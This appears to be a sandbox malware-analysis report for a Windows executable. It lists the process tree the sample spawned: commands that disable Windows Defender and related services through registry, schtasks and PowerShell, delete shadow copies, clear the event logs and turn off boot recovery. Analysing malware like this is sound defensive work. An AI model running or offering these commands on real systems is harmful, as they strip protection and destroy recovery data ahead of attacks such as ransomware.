cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1508 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1508 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1508 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1780 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1780 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1780 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1636 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1636 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1636 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1764 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:756
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:572
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1372
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:788
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1072
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2016
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1332
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1716
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1692
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1624
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1508
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1780
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1636
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1764
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1060
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:868
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:240
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1368
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:764
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1840
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1568
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:836
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1000
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1856
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:676
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:924
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1772
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1528
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1376
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1988
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1136
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2024
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1980
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1300
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:544
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:860
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1072
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1196
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1844
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1560 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1500
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:892 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2064 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2248
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5216713faf5ad3db231c65bc3fc07f2e7
SHA1c325742dc83cddf54949c60fe4f77ebeb63dc906
SHA25672776fc4a59574f414dfeb634bc5fcf58f462dd922bac82e05326749dbfc8f54
SHA51232ea81b4a7387afe8b3f8ae5fcc76fbceb2f8fdc09616b07cc05b9d52312b9fdc8294e9f8681233ec69e7b67c0aa0e2c7cde1d78f0e9777cbdfbfc4b12fe510c